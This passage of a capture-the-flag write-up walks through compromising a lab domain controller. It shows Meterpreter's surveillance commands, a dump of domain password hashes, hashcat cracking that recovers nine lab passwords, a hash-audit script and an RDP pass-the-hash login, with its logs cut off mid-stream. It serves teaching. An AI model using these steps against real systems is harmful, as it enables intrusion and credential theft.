    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyboard_send  Send keystrokes
    keyevent       Send key events
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    mouse          Send mouse events
    screenshare    Watch the remote user desktop in real time
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes
Since this was a CTF, time was of the essence, so I wanted to get to a command shell as quickly as possible and issued the shell command right away to explore.
meterpreter > shell
meterpreter > shell
Process 4300 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
Typically, the first command I run after getting a shell through Meterpreter is whoami.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
In this case, the shell runs as NT AUTHORITY\SYSTEM, the highest local privilege level. Because this host is a domain controller, that is effectively full control of the scoville.local domain as well: SYSTEM on a DC can read the directory database and every password hash in it. Since I needed a way into the desktop environment, this is a perfect level of access to start from.
User enumeration
During the CTF, my first instinct was to get a user account with administrator-level access, so I decided to enumerate the users. There are two ways that I know of to get a list of user accounts in this scenario.
Meterpreter shell
As previously mentioned, I did not know how to use Metasploit back then, so I did not use this method during the event. But after taking the Penetration Testing Student course and passing the eJPT exam, I know more now and can share it with you.
To enumerate the users on this machine, we can issue the hashdump command while still in the Meterpreter shell. It lists the accounts together with their password hashes in pwdump format (user:RID:LM hash:NT hash:::), which we can try to crack or, as we will see, use directly. Because this host is a domain controller, the dump is the domain's account database rather than a local SAM: it includes krbtgt and the machine accounts CAYENNE$ and ANAHEIM$. The LM field aad3b435b51404eeaad3b435b51404ee on every line means no LM hash is stored, so only the NT hash matters.
meterpreter > hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a44b8c433cb56c8d8ad27f7f4df44ab6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bc5cd4292afb61d1ffe517a2637860ad:::
summer.sloan:1112:aad3b435b51404eeaad3b435b51404ee:f3fe9e6330783d307510cc18645b1d0f:::
darcy.roman:1113:aad3b435b51404eeaad3b435b51404ee:d33b15ba0f27dbf0fd56cd54b1db1ade:::
troy.yates:1114:aad3b435b51404eeaad3b435b51404ee:e08847c1090227cb3a9ad59893094b32:::
eve.barr:1115:aad3b435b51404eeaad3b435b51404ee:9a1bece5360ef81d379470d065f95562:::
max.clark:1116:aad3b435b51404eeaad3b435b51404ee:308c4a9a9120c711cfb117ec019e1a9a:::
sally.bird:1117:aad3b435b51404eeaad3b435b51404ee:77a7ad444bf629952a9dc8cc2adcf0e5:::
jessy.rogers:1118:aad3b435b51404eeaad3b435b51404ee:83ccff469a423cb19d391a5fd0b61c28:::
yoder.mullins:1119:aad3b435b51404eeaad3b435b51404ee:4fc7ba2babad8553ef6bf7f9f706b128:::
jace.le:1120:aad3b435b51404eeaad3b435b51404ee:38597e7e9feaeefd8135f9bc981b7499:::
fern.scott:1121:aad3b435b51404eeaad3b435b51404ee:61cedcc6b3f7104ded374fd8fb29b0a4:::
admin.local:1122:aad3b435b51404eeaad3b435b51404ee:699b68000f83d0ce2070a7d3868bee59:::
CAYENNE$:1002:aad3b435b51404eeaad3b435b51404ee:e431643467fea33be6f3f3604dcb21f0:::
ANAHEIM$:1123:aad3b435b51404eeaad3b435b51404ee:96e684520b474d918ca28f96f22e9337:::
Command shell
Alternatively, we can enumerate users by using the command shell. During the CTF, this was the method I used to display usernames on this Windows domain controller.
We can issue the net user command to display a list of the usernames available on this host.
C:\Windows\system32>net user

User accounts for \\

-------------------------------------------------------------------------------
admin.local              Administrator            darcy.roman
eve.barr                 fern.scott               Guest
jace.le                  jessy.rogers             krbtgt
max.clark                sally.bird               summer.sloan
troy.yates               yoder.mullins
The command completed with one or more errors.
While that accomplishes our task, the better choice is the net group "domain admins" command, because I wanted a domain account with administrator privileges.
C:\Windows\system32>net group "domain admins"
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            fern.scott               jace.le
The command completed successfully.
Gaining access
As previously mentioned, I wanted to access the desktop environment so that it would be easy to look around the computer. I figured I should stick with my first instinct and what I already knew, to save time.
There are four options that I could think of to get access to the desktop environment with a user account. One option is to crack the password; however, I did not know the hashdump command at the time.
The second option is to create a new account. It is one of the tactics adversaries use to establish persistence. At the time, I was not thinking about this, so I went with the last option.
The third option is the pass-the-hash method. At the time, I did not know how to do this. In this article, we will explore this option.
The last option is to change the account's password. At the time, I thought it was a good idea since this is not a production environment anyway. In real life, adversaries will try their best not to get caught, so this is not an option they would use.
Password cracking
Before attempting to crack the passwords, it is worth discussing Windows password hashes a little. Earlier versions of Windows used LAN Manager (LANMAN or LM) to generate password hashes. Eventually, Microsoft switched to using the NT hash, starting with Windows 2000, at least according to my limited research.
With the switch to New Technology LAN Manager (NTLM), the format you see in hashdump or a similar tool looks like this: username:userid:LMHASH:NTHASH.
Some Windows versions still generated an LM hash when the password was shorter than 15 characters. Later versions eventually dropped the use of LM hashes by default.
It is good to know which hashes are of no use to you before cracking passwords. Accounts whose hash values match the example below have an empty password, which means those accounts cannot be used for authentication.
Let's take the Guest account, for example. This account has an empty LANMAN and NT hash, which means it is of no use to us. We can spot these values with a mnemonic. For the LM hash (aad3b...), use Am All Day Baffled By. For the NT hash (31d6cfe0d...), use Difficult Choices For Encrypted Data. I am sure there are other mnemonics, but this is the one I use.
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
We can safely ignore accounts with empty LM and NT hashes. Additionally, if the LM hashes match our mnemonic, we do not have to crack them. Since every entry in our dump has an empty LM hash, we will concentrate on the NT hashes.
I took the hashdump output and put all of its contents in a file.
andrew@kali:~$ cat hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a44b8c433cb56c8d8ad27f7f4df44ab6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bc5cd4292afb61d1ffe517a2637860ad:::
summer.sloan:1112:aad3b435b51404eeaad3b435b51404ee:f3fe9e6330783d307510cc18645b1d0f:::
darcy.roman:1113:aad3b435b51404eeaad3b435b51404ee:d33b15ba0f27dbf0fd56cd54b1db1ade:::
troy.yates:1114:aad3b435b51404eeaad3b435b51404ee:e08847c1090227cb3a9ad59893094b32:::
eve.barr:1115:aad3b435b51404eeaad3b435b51404ee:9a1bece5360ef81d379470d065f95562:::
max.clark:1116:aad3b435b51404eeaad3b435b51404ee:308c4a9a9120c711cfb117ec019e1a9a:::
sally.bird:1117:aad3b435b51404eeaad3b435b51404ee:77a7ad444bf629952a9dc8cc2adcf0e5:::
jessy.rogers:1118:aad3b435b51404eeaad3b435b51404ee:83ccff469a423cb19d391a5fd0b61c28:::
yoder.mullins:1119:aad3b435b51404eeaad3b435b51404ee:4fc7ba2babad8553ef6bf7f9f706b128:::
jace.le:1120:aad3b435b51404eeaad3b435b51404ee:38597e7e9feaeefd8135f9bc981b7499:::
fern.scott:1121:aad3b435b51404eeaad3b435b51404ee:61cedcc6b3f7104ded374fd8fb29b0a4:::
admin.local:1122:aad3b435b51404eeaad3b435b51404ee:699b68000f83d0ce2070a7d3868bee59:::
CAYENNE$:1002:aad3b435b51404eeaad3b435b51404ee:e431643467fea33be6f3f3604dcb21f0:::
ANAHEIM$:1123:aad3b435b51404eeaad3b435b51404ee:96e684520b474d918ca28f96f22e9337:::
Then, I used the cut utility to remove the fields I did not want and saved the result to another file.
andrew@kali:~$ cat hashes | cut -d ':' -f 1,4
Administrator:a44b8c433cb56c8d8ad27f7f4df44ab6
Guest:31d6cfe0d16ae931b73c59d7e0c089c0
krbtgt:bc5cd4292afb61d1ffe517a2637860ad
summer.sloan:f3fe9e6330783d307510cc18645b1d0f
darcy.roman:d33b15ba0f27dbf0fd56cd54b1db1ade
troy.yates:e08847c1090227cb3a9ad59893094b32
eve.barr:9a1bece5360ef81d379470d065f95562
max.clark:308c4a9a9120c711cfb117ec019e1a9a
sally.bird:77a7ad444bf629952a9dc8cc2adcf0e5
jessy.rogers:83ccff469a423cb19d391a5fd0b61c28
yoder.mullins:4fc7ba2babad8553ef6bf7f9f706b128
jace.le:38597e7e9feaeefd8135f9bc981b7499
fern.scott:61cedcc6b3f7104ded374fd8fb29b0a4
admin.local:699b68000f83d0ce2070a7d3868bee59
CAYENNE$:e431643467fea33be6f3f3604dcb21f0
ANAHEIM$:96e684520b474d918ca28f96f22e9337
Additionally, I took out the accounts that I did not want to crack.
andrew@kali:~$ cat hash
Administrator:a44b8c433cb56c8d8ad27f7f4df44ab6
summer.sloan:f3fe9e6330783d307510cc18645b1d0f
darcy.roman:d33b15ba0f27dbf0fd56cd54b1db1ade
troy.yates:e08847c1090227cb3a9ad59893094b32
eve.barr:9a1bece5360ef81d379470d065f95562
max.clark:308c4a9a9120c711cfb117ec019e1a9a
sally.bird:77a7ad444bf629952a9dc8cc2adcf0e5
jessy.rogers:83ccff469a423cb19d391a5fd0b61c28
yoder.mullins:4fc7ba2babad8553ef6bf7f9f706b128
jace.le:38597e7e9feaeefd8135f9bc981b7499
fern.scott:61cedcc6b3f7104ded374fd8fb29b0a4
admin.local:699b68000f83d0ce2070a7d3868bee59
Let's get cracking
We are now ready to use hashcat to crack the hashes. Since we are cracking NT hashes, we will use hash mode 1000, NTLM in hashcat's terminology. For the attack mode, we will use -a 0, a straight wordlist attack with rockyou.txt (hashcat reserves the term brute force for the mask attack, mode 3). Additionally, since we also included the username in the hash file, we need to tell hashcat with --username to skip it when cracking.
andrew@kali:~$ hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt --username --separator ":"
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-10710U CPU @ 1.10GHz, 1422/1486 MB (512 MB allocatable), 1MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 12 digests; 12 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

f3fe9e6330783d307510cc18645b1d0f:butterfly
e08847c1090227cb3a9ad59893094b32:tinkerbell
d33b15ba0f27dbf0fd56cd54b1db1ade:spongebob
9a1bece5360ef81d379470d065f95562:dolphins
308c4a9a9120c711cfb117ec019e1a9a:asdfghjkl
83ccff469a423cb19d391a5fd0b61c28:ladybug
77a7ad444bf629952a9dc8cc2adcf0e5:popcorn
4fc7ba2babad8553ef6bf7f9f706b128:margarita
38597e7e9feaeefd8135f9bc981b7499:nikita
Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: NTLM
Hash.Target......: hash
Time.Started.....: Wed Dec 16 19:46:53 2021 (4 secs)
Time.Estimated...: Wed Dec 16 19:46:57 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4568.0 kH/s (0.12ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 9/12 (75.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]

Started: Wed Dec 16 19:46:53 2021
Stopped: Wed Dec 16 19:46:58 2021
As you can see from the output above, it is hard to tell which account each cracked password belongs to. We can issue another command to line up the cracked passwords with the usernames.
andrew@kali:~$ hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt --username --separator ":" --show
summer.sloan:f3fe9e6330783d307510cc18645b1d0f:butterfly
darcy.roman:d33b15ba0f27dbf0fd56cd54b1db1ade:spongebob
troy.yates:e08847c1090227cb3a9ad59893094b32:tinkerbell
eve.barr:9a1bece5360ef81d379470d065f95562:dolphins
max.clark:308c4a9a9120c711cfb117ec019e1a9a:asdfghjkl
sally.bird:77a7ad444bf629952a9dc8cc2adcf0e5:popcorn
jessy.rogers:83ccff469a423cb19d391a5fd0b61c28:ladybug
yoder.mullins:4fc7ba2babad8553ef6bf7f9f706b128:margarita
jace.le:38597e7e9feaeefd8135f9bc981b7499:nikita
It looks like jace.le is using a weak password, and since this account is a member of Domain Admins, we can use it to connect via RDP.
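As an added example, not code from the original write-up, the following Python script covers two points from this section: the username:userid:LMHASH:NTHASH format with the empty-LM and empty-NT constants behind the mnemonics, and why an unsalted NT hash makes a single wordlist pass so cheap (one hash per candidate is compared against every account at once, which is also how a defender audits a directory against a banned-password list). The function names (nt_hash, parse_pwdump_line, select_crackable, audit_banned) are my own, the MD4 is a pure-Python RFC 1320 implementation because hashlib's md4 is frequently unavailable on OpenSSL 3 builds, and the sample lines are copied from the hashdump output above.

```python
"""Added example (not from the original write-up): parse pwdump-style lines, spot
empty or unused hashes, and audit unsalted NT hashes against a banned-password list."""
import struct

# Hash of an empty password in each format. The LM value is also what you see when
# LM storage is disabled, which is why every line in the dump above carries it.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # "Am All Day Baffled By"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # "Difficult Choices For Encrypted Data"
_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib.new('md4') is often missing on OpenSSL 3."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    f = lambda x, y, z: (x & y) | (~x & _MASK & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                v[0] = _rotl((v[0] + fn(v[1], v[2], v[3]) + x[k] + const) & _MASK, shifts[i % 4])
                v.insert(0, v.pop())   # rotate so the next step updates d, then c, then b, ...
        state = [(s + w) & _MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password: no salt, no iterations."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump_line(line: str) -> dict:
    """Split user:rid:LM:NT::: and flag what is worth looking at."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    lm, nt = lm.lower(), nt.lower()
    return {"user": user, "rid": int(rid), "lm": lm, "nt": nt,
            "lm_stored": lm != EMPTY_LM,      # a real LM hash is far weaker than NT
            "nt_empty": nt == EMPTY_NT,       # empty password: nothing to crack
            "machine": user.endswith("$")}    # computer accounts: long random passwords


def select_crackable(dump_lines, skip=("guest", "krbtgt")):
    """The filtering the page did by hand with cut: user:NT for accounts worth testing."""
    kept = []
    for line in dump_lines:
        if not line.strip():
            continue
        e = parse_pwdump_line(line)
        if e["nt_empty"] or e["machine"] or e["user"].lower() in skip:
            continue
        kept.append(f"{e['user']}:{e['nt']}")
    return kept


def audit_banned(entries, banned_passwords):
    """Defender-side check. Because NT hashes are unsalted, hashing each banned
    password once covers every account; entries is a list of (user, nt_hex)."""
    lookup = {nt_hash(p): p for p in banned_passwords}
    return {user: lookup[nt] for user, nt in entries if nt in lookup}


# Lines copied from the hashdump output above.
SAMPLE_DUMP = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:a44b8c433cb56c8d8ad27f7f4df44ab6:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "summer.sloan:1112:aad3b435b51404eeaad3b435b51404ee:f3fe9e6330783d307510cc18645b1d0f:::",
    "CAYENNE$:1002:aad3b435b51404eeaad3b435b51404ee:e431643467fea33be6f3f3604dcb21f0:::",
]

if __name__ == "__main__":
    print("NT hash of an empty password:", nt_hash(""))   # 31d6cfe0d16ae931b73c59d7e0c089c0
    for line in SAMPLE_DUMP:
        e = parse_pwdump_line(line)
        print(f"{e['user']:<14} lm_stored={e['lm_stored']} nt_empty={e['nt_empty']} machine={e['machine']}")
    kept = select_crackable(SAMPLE_DUMP)
    print("worth testing:", kept)
    entries = [tuple(item.split(":")) for item in kept]
    # Constructed banned list; a hit means that account's password is on the list.
    print("banned-list hits:", audit_banned(entries, ["password", "butterfly", "123456"]))
```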
Pass the hash
If we opt for the pass-the-hash approach to access the desktop via RDP, we need to gather some information first. We need the username, the NT hash, the domain name, and the target's IP address to connect.
Our Nmap results already revealed the domain name, so we are good to go. Had we run Nmap with different options, we would not have the domain name; in that case, we can use the command shell to gather this information.
C:\Windows\system32>systeminfo | findstr /B Domain
Domain: scoville.local
RDP access via pass the hash
Since we have the necessary information, we are ready to access the desktop via RDP. There are two RDP clients available in Kali Linux: xfreerdp and rdesktop. As far as I know, rdesktop does not offer a pass-the-hash option, but xfreerdp does, so we are going to use xfreerdp for this task.
The command shown below is self-explanatory, so we are not going to discuss what each option does. After the connection lines, xfreerdp logs the whole NTLM negotiation and every RDP capability set it receives from the server; the lines worth noticing are the certificate warning, which shows the self-signed certificate for cayenne.scoville.local.
andrew@kali:~$ xfreerdp /u:Administrator /d:scoville.local /pth:a44b8c433cb56c8d8ad27f7f4df44ab6 /v:172.20.20.37
[19:05:52:302] [820544:820545] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[19:05:52:302] [820544:820545] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[19:05:52:302] [820544:820545] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[19:05:52:302] [820544:820545] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[19:05:52:612] [820544:820545] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized
[19:05:52:622] [820544:820545] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state
[19:05:52:628] [820544:820545] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state
[19:05:52:659] [820544:820545] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[19:05:52:659] [820544:820545] [WARN][com.freerdp.crypto] - CN = cayenne.scoville.local
[19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - VERSION ={
[19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	ProductMajorVersion: 6
[19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	ProductMinorVersion: 1
[19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	ProductBuild: 7601
[19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	Reserved: 0x000000
[19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 	NTLMRevisionCurrent: 0x0F
[INFO][com.freerdp.core.capabilities] - largePointerSupportFlags: 0x0001 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - InputCapabilitySet (length 84) [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - inputFlags: 0x0175 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsA: 0x0000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardLayout: 0x00000000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardType: 0x00000000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardSubType: 0x00000000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardFunctionKey: 0x00000000 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - RemoteProgramsCapabilitySet (length 4): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - railSupportLevel: 0x0000003F [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - WindowListCapabilitySet (length 7): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - wndSupportLevel: 0x00000002 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - numIconCaches: 0x03 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - numIconCacheEntries: 0x000C [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - DesktopCompositionCapabilitySet (length 2): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - compDeskSupportLevel: 0x0001 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] 
[820544:820545] [INFO][com.freerdp.core.capabilities] - MultifragmentUpdateCapabilitySet (length 4): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - maxRequestSize: 0x000094A7 [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - SurfaceCommandsCapabilitySet (length 8): [19:05:54:969] [820544:820545] [INFO][com.freerdp.core.capabilities] - cmdFlags: 0x00000052 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - reserved: 0x00000000 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - FrameAcknowledgeCapabilitySet (length 4): [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - frameAcknowledge: 0x00000000 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - GeneralCapabilitySet (length 20): [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - osMajorType: 0x0004 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - osMinorType: 0x0007 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - protocolVersion: 0x0200 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsA: 0x0000 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - generalCompressionTypes: 0x0000 [19:05:54:970] [820544:820545] [INFO][com.freerdp.core.capabilities] - extraFlags: 0x0415 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - updateCapabilityFlag: 0x0000 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - remoteUnshareFlag: 0x0000 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - generalCompressionLevel: 0x0000 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - 
refreshRectSupport: 0x01 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - suppressOutputSupport: 0x01 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCapabilitySet (length 24): [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - preferredBitsPerPixel: 0x0010 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - receive1BitPerPixel: 0x0001 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - receive4BitsPerPixel: 0x0001 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - receive8BitsPerPixel: 0x0001 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopWidth: 0x0400 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopHeight: 0x0300 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopResizeFlag: 0x0001 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCompressionFlag: 0x0001 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - highColorFlags: 0x00 [19:05:54:971] [820544:820545] [INFO][com.freerdp.core.capabilities] - drawingFlags: 0x0E [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - multipleRectangleSupport: 0x0001 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsB: 0x0000 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - OrderCapabilitySet (length 84): [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad4OctetsA: 0x00000000 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopSaveXGranularity: 0x0001 [19:05:54:972] [820544:820545] 
[INFO][com.freerdp.core.capabilities] - desktopSaveYGranularity: 0x0014 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsA: 0x0000 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - maximumOrderLevel: 0x0001 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - numberFonts: 0x0000 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - orderFlags: 0x00AA [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - orderSupport: [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - DSTBLT: 1 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - PATBLT: 1 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - SCRBLT: 1 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - MEMBLT: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - MEM3BLT: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - ATEXTOUT: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - AEXTTEXTOUT: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - DRAWNINEGRID: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - LINETO: 1 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTI_DRAWNINEGRID: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - OPAQUE_RECT: 0 [19:05:54:972] [820544:820545] [INFO][com.freerdp.core.capabilities] - SAVEBITMAP: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - WTEXTOUT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] 